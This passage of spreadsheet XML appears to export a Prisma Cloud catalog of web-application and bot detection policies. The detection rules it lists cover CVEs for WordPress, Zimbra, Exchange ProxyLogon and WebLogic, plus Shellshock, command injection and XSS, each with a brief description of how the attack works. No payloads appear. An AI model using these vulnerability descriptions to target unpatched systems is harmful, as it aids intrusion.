          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3404" s="2" t="inlineStr"/>
      <c r="D3404" t="inlineStr"/>
      <c r="E3404" t="inlineStr"/>
      <c r="F3404" t="inlineStr"/>
      <c r="G3404" t="b">
        <v>1</v>
      </c>
      <c r="H34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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3404" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3404" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2018-6389 - WordPress &lt;= 4.9.2 DoS via load-scripts or load-styles) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3404" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3404" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3404" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3404" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3404" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3404" t="inlineStr"/>
      <c r="R3404" t="inlineStr"/>
      <c r="S3404" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3404" t="b">
        <v>0</v>
      </c>
      <c r="U3404" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3404" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3404" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.</t>
        </is>
      </c>
      <c r="X340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4" t="inlineStr"/>
      <c r="Z3404" t="inlineStr"/>
      <c r="AA3404" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3404" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3404" t="inlineStr"/>
      <c r="AD3404" t="b">
        <v>1</v>
      </c>
      <c r="AE3404" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3404" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG34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4" t="inlineStr">
        <is>
          <t>bf7c8dd2-d429-45b4-947e-80020e16bcb2</t>
        </is>
      </c>
      <c r="AI3404" t="inlineStr"/>
      <c r="AJ3404" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3404" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3405">
      <c r="A3405" t="inlineStr"/>
      <c r="B3405" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3405" s="2" t="inlineStr"/>
      <c r="D3405" t="inlineStr"/>
      <c r="E3405" t="inlineStr"/>
      <c r="F3405" t="inlineStr"/>
      <c r="G3405" t="b">
        <v>0</v>
      </c>
      <c r="H340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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3405" t="inlineStr">
        <is>
          <t>known_bots_api</t>
        </is>
      </c>
      <c r="K3405" t="inlineStr">
        <is>
          <t>Business analytics bot activity</t>
        </is>
      </c>
      <c r="L3405" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3405" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3405" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3405" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3405" t="inlineStr">
        <is>
          <t>known_bots</t>
        </is>
      </c>
      <c r="Q3405" t="inlineStr"/>
      <c r="R3405" t="inlineStr"/>
      <c r="S3405" t="inlineStr"/>
      <c r="T3405" t="b">
        <v>0</v>
      </c>
      <c r="U3405" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3405" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3405" t="inlineStr">
        <is>
          <t>This policy detects bots that crawl, extract and index business related information.</t>
        </is>
      </c>
      <c r="X340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5" t="inlineStr"/>
      <c r="Z3405" t="inlineStr"/>
      <c r="AA3405" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3405" t="inlineStr">
        <is>
          <t>2023-06-15 01:00:00</t>
        </is>
      </c>
      <c r="AC3405" t="inlineStr"/>
      <c r="AD3405" t="b">
        <v>1</v>
      </c>
      <c r="AE3405" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3405" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG340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5" t="inlineStr">
        <is>
          <t>de3f705c-bf99-4ef3-ac43-252f363eb3c2</t>
        </is>
      </c>
      <c r="AI3405" t="inlineStr"/>
      <c r="AJ3405" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3405" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3406">
      <c r="A3406" t="inlineStr"/>
      <c r="B3406" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3406" s="2" t="inlineStr"/>
      <c r="D3406" t="inlineStr"/>
      <c r="E3406" t="inlineStr"/>
      <c r="F3406" t="inlineStr"/>
      <c r="G3406" t="b">
        <v>1</v>
      </c>
      <c r="H340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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3406" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3406" t="inlineStr">
        <is>
          <t>API Library activity</t>
        </is>
      </c>
      <c r="L3406" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3406" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3406" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3406" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3406" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3406" t="inlineStr"/>
      <c r="R3406" t="inlineStr"/>
      <c r="S3406" t="inlineStr"/>
      <c r="T3406" t="b">
        <v>0</v>
      </c>
      <c r="U3406" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3406" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3406" t="inlineStr">
        <is>
          <t>This policy detects software code libraries for Web API communications.</t>
        </is>
      </c>
      <c r="X340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6" t="inlineStr"/>
      <c r="Z3406" t="inlineStr"/>
      <c r="AA3406" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3406" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3406" t="inlineStr"/>
      <c r="AD3406" t="b">
        <v>1</v>
      </c>
      <c r="AE3406" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3406" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG340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6" t="inlineStr">
        <is>
          <t>f96dc9b5-af3b-4155-a928-cb461eaccc27</t>
        </is>
      </c>
      <c r="AI3406" t="inlineStr"/>
      <c r="AJ3406" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3406" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3407">
      <c r="A3407" t="inlineStr"/>
      <c r="B3407" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3407" s="2" t="inlineStr"/>
      <c r="D3407" t="inlineStr"/>
      <c r="E3407" t="inlineStr"/>
      <c r="F3407" t="inlineStr"/>
      <c r="G3407" t="b">
        <v>1</v>
      </c>
      <c r="H340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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3407" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3407" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2022-27925 - Zimbra RCE) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3407" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3407" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3407" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3407" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3407" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3407" t="inlineStr"/>
      <c r="R3407" t="inlineStr"/>
      <c r="S3407" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3407" t="b">
        <v>0</v>
      </c>
      <c r="U3407" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3407" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3407" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.</t>
        </is>
      </c>
      <c r="X340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7" t="inlineStr"/>
      <c r="Z3407" t="inlineStr"/>
      <c r="AA3407" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3407" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3407" t="inlineStr"/>
      <c r="AD3407" t="b">
        <v>1</v>
      </c>
      <c r="AE3407" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3407" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG340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7" t="inlineStr">
        <is>
          <t>15c7ee0b-15a5-4a38-839b-12c08383f065</t>
        </is>
      </c>
      <c r="AI3407" t="inlineStr"/>
      <c r="AJ3407" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3407" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3408">
      <c r="A3408" t="inlineStr"/>
      <c r="B3408" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3408" s="2" t="inlineStr"/>
      <c r="D3408" t="inlineStr"/>
      <c r="E3408" t="inlineStr"/>
      <c r="F3408" t="inlineStr"/>
      <c r="G3408" t="b">
        <v>0</v>
      </c>
      <c r="H340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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3408" t="inlineStr">
        <is>
          <t>known_bots_api</t>
        </is>
      </c>
      <c r="K3408" t="inlineStr">
        <is>
          <t>Media Search Bot activity</t>
        </is>
      </c>
      <c r="L3408" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3408" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3408" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3408" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3408" t="inlineStr">
        <is>
          <t>known_bots</t>
        </is>
      </c>
      <c r="Q3408" t="inlineStr"/>
      <c r="R3408" t="inlineStr"/>
      <c r="S3408" t="inlineStr"/>
      <c r="T3408" t="b">
        <v>0</v>
      </c>
      <c r="U3408" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3408" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3408" t="inlineStr">
        <is>
          <t>This policy detects bots that crawl, extract and index media contents for search engine purposes.</t>
        </is>
      </c>
      <c r="X340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8" t="inlineStr"/>
      <c r="Z3408" t="inlineStr"/>
      <c r="AA3408" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3408" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3408" t="inlineStr"/>
      <c r="AD3408" t="b">
        <v>1</v>
      </c>
      <c r="AE3408" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3408" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG340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8" t="inlineStr">
        <is>
          <t>e711f1d0-6fc9-42c2-94cf-8d7e3a615ea2</t>
        </is>
      </c>
      <c r="AI3408" t="inlineStr"/>
      <c r="AJ3408" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3408" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3409">
      <c r="A3409" t="inlineStr"/>
      <c r="B3409" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3409" s="2" t="inlineStr"/>
      <c r="D3409" t="inlineStr"/>
      <c r="E3409" t="inlineStr"/>
      <c r="F3409" t="inlineStr"/>
      <c r="G3409" t="b">
        <v>1</v>
      </c>
      <c r="H340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09" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3409" t="inlineStr">
        <is>
          <t>shellshock_api</t>
        </is>
      </c>
      <c r="K3409" t="inlineStr">
        <is>
          <t>Shellshock payload detected in HTTP traffic</t>
        </is>
      </c>
      <c r="L3409" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3409" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3409" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3409" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3409" t="inlineStr">
        <is>
          <t>shellshock</t>
        </is>
      </c>
      <c r="Q3409" t="inlineStr"/>
      <c r="R3409" t="inlineStr"/>
      <c r="S3409" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3409" t="b">
        <v>0</v>
      </c>
      <c r="U3409" t="inlineStr">
        <is>
          <t>web_attacks</t>
        </is>
      </c>
      <c r="V3409" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3409" t="inlineStr">
        <is>
          <t>This policy detects Shellshock attacks. Shellshock is a unique privilege escalation vulnerability that permits remote code execution. In unpatched versions of the bash shell interpreter, the Shellshock vulnerability lets attackers create environment variables with specially crafted values that contain code. As soon as the shell is invoked, the attacker’s code is executed.
      WAAS checks for requests that are crafted to exploit the Shellshock vulnerability.</t>
        </is>
      </c>
      <c r="X340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09" t="inlineStr"/>
      <c r="Z3409" t="inlineStr"/>
      <c r="AA3409" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3409" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:59</t>
        </is>
      </c>
      <c r="AC3409" t="inlineStr"/>
      <c r="AD3409" t="b">
        <v>1</v>
      </c>
      <c r="AE3409" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3409" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG340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09" t="inlineStr">
        <is>
          <t>ad9b1051-6ded-4b6b-b0c6-a64f09c2ac34</t>
        </is>
      </c>
      <c r="AI3409" t="inlineStr"/>
      <c r="AJ3409" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3409" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3410">
      <c r="A3410" t="inlineStr"/>
      <c r="B3410" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3410" s="2" t="inlineStr"/>
      <c r="D3410" t="inlineStr"/>
      <c r="E3410" t="inlineStr"/>
      <c r="F3410" t="inlineStr"/>
      <c r="G3410" t="b">
        <v>1</v>
      </c>
      <c r="H341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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3410" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3410" t="inlineStr">
        <is>
          <t>Web client initiated a request using an HTTP method other than GET and did not include a cookie</t>
        </is>
      </c>
      <c r="L3410" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3410" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3410" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3410" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3410" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3410" t="inlineStr"/>
      <c r="R3410" t="inlineStr"/>
      <c r="S3410" t="inlineStr"/>
      <c r="T3410" t="b">
        <v>0</v>
      </c>
      <c r="U3410" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3410" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3410" t="inlineStr">
        <is>
          <t>This policy is designed to safeguard applications against potentially malicious or unauthorized automated requests. It mandates that clients sending HTTP request using the any HTTP method other than GET include a valid cookie. Typically, interactions using such methods are preceded by a GET request, during which a cookie is set. The policy serves to prevent abuse, unauthorized access, and potential disruptions caused by bots or automated scripts.</t>
        </is>
      </c>
      <c r="X341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0" t="inlineStr"/>
      <c r="Z3410" t="inlineStr"/>
      <c r="AA3410" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3410" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3410" t="inlineStr"/>
      <c r="AD3410" t="b">
        <v>1</v>
      </c>
      <c r="AE3410" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3410" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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0" t="inlineStr">
        <is>
          <t>7204b70c-532e-44fa-9679-bc325b71c9c3</t>
        </is>
      </c>
      <c r="AI3410" t="inlineStr"/>
      <c r="AJ3410" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3410" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3411">
      <c r="A3411" t="inlineStr"/>
      <c r="B3411" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3411" s="2" t="inlineStr"/>
      <c r="D3411" t="inlineStr"/>
      <c r="E3411" t="inlineStr"/>
      <c r="F3411" t="inlineStr"/>
      <c r="G3411" t="b">
        <v>1</v>
      </c>
      <c r="H341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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3411" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3411" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2021-26858, CVE-2021-27065 - ProxyLogon/HAFNIUM RCE Attack Chain) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3411" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3411" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3411" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3411" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3411" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3411" t="inlineStr"/>
      <c r="R3411" t="inlineStr"/>
      <c r="S3411" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3411" t="b">
        <v>0</v>
      </c>
      <c r="U3411" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3411" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3411" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Microsoft Exchange Server Remote Code Execution Vulnerability</t>
        </is>
      </c>
      <c r="X341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1" t="inlineStr"/>
      <c r="Z3411" t="inlineStr"/>
      <c r="AA3411" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3411" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3411" t="inlineStr"/>
      <c r="AD3411" t="b">
        <v>1</v>
      </c>
      <c r="AE3411" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3411" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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1" t="inlineStr">
        <is>
          <t>8ae98e3e-7257-4a86-aefc-c0e37586d7f9</t>
        </is>
      </c>
      <c r="AI3411" t="inlineStr"/>
      <c r="AJ3411" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3411" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3412">
      <c r="A3412" t="inlineStr"/>
      <c r="B3412" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3412" s="2" t="inlineStr"/>
      <c r="D3412" t="inlineStr"/>
      <c r="E3412" t="inlineStr"/>
      <c r="F3412" t="inlineStr"/>
      <c r="G3412" t="b">
        <v>1</v>
      </c>
      <c r="H341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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3412" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3412" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2020-14882, CVE-2020-14883 - WebLogic RCE) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3412" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3412" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3412" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3412" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3412" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3412" t="inlineStr"/>
      <c r="R3412" t="inlineStr"/>
      <c r="S3412" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3412" t="b">
        <v>0</v>
      </c>
      <c r="U3412" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3412" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3412" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.</t>
        </is>
      </c>
      <c r="X341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2" t="inlineStr"/>
      <c r="Z3412" t="inlineStr"/>
      <c r="AA3412" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3412" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3412" t="inlineStr"/>
      <c r="AD3412" t="b">
        <v>1</v>
      </c>
      <c r="AE3412" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3412" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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2" t="inlineStr">
        <is>
          <t>c6313812-ae99-4732-bad4-1d149e50ff65</t>
        </is>
      </c>
      <c r="AI3412" t="inlineStr"/>
      <c r="AJ3412" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3412" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3413">
      <c r="A3413" t="inlineStr"/>
      <c r="B3413" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3413" s="2" t="inlineStr"/>
      <c r="D3413" t="inlineStr"/>
      <c r="E3413" t="inlineStr"/>
      <c r="F3413" t="inlineStr"/>
      <c r="G3413" t="b">
        <v>1</v>
      </c>
      <c r="H341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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3413" t="inlineStr">
        <is>
          <t>injections_api</t>
        </is>
      </c>
      <c r="K3413" t="inlineStr">
        <is>
          <t>Command Injection payload detected in HTTP traffic</t>
        </is>
      </c>
      <c r="L3413" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3413" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3413" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3413" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3413" t="inlineStr">
        <is>
          <t>injections</t>
        </is>
      </c>
      <c r="Q3413" t="inlineStr"/>
      <c r="R3413" t="inlineStr"/>
      <c r="S3413" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3413" t="b">
        <v>0</v>
      </c>
      <c r="U3413" t="inlineStr">
        <is>
          <t>web_attacks</t>
        </is>
      </c>
      <c r="V3413" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3413" t="inlineStr">
        <is>
          <t>This policy detects Command injection attacks. Command injection is a form of attack in which attackers attempt to run arbitrary commands on the web application’s host.
Command  payloads are either injected as part of HTTP requests or included from local or remote files (also known as File Inclusion).</t>
        </is>
      </c>
      <c r="X341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3" t="inlineStr"/>
      <c r="Z3413" t="inlineStr"/>
      <c r="AA3413" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3413" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:59</t>
        </is>
      </c>
      <c r="AC3413" t="inlineStr"/>
      <c r="AD3413" t="b">
        <v>1</v>
      </c>
      <c r="AE3413" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3413" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG341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3" t="inlineStr">
        <is>
          <t>85a6bee6-83c1-4772-b17a-9d6cc57d7eb0</t>
        </is>
      </c>
      <c r="AI3413" t="inlineStr"/>
      <c r="AJ3413" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3413" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3414">
      <c r="A3414" t="inlineStr"/>
      <c r="B3414" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3414" s="2" t="inlineStr"/>
      <c r="D3414" t="inlineStr"/>
      <c r="E3414" t="inlineStr"/>
      <c r="F3414" t="inlineStr"/>
      <c r="G3414" t="b">
        <v>1</v>
      </c>
      <c r="H341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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3414" t="inlineStr">
        <is>
          <t>injections_api</t>
        </is>
      </c>
      <c r="K3414" t="inlineStr">
        <is>
          <t>XSS payload detected in HTTP traffic</t>
        </is>
      </c>
      <c r="L3414" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3414" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3414" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3414" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3414" t="inlineStr">
        <is>
          <t>injections</t>
        </is>
      </c>
      <c r="Q3414" t="inlineStr"/>
      <c r="R3414" t="inlineStr"/>
      <c r="S3414" t="inlineStr"/>
      <c r="T3414" t="b">
        <v>0</v>
      </c>
      <c r="U3414" t="inlineStr">
        <is>
          <t>web_attacks</t>
        </is>
      </c>
      <c r="V3414" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3414" t="inlineStr">
        <is>
          <t>This policy detects Cross-Site Scripting (XSS) attacks. XSS is a type of injection attack, in which malicious JavaScript snippets are injected into otherwise benign and trusted web sites. Attackers try to trick the browser into switching to a Javascript context, and executing arbitrary code.
WAAS parses and tokenizes input streams (request data) and then searches for matching fingerprints of known malicious attack patterns.</t>
        </is>
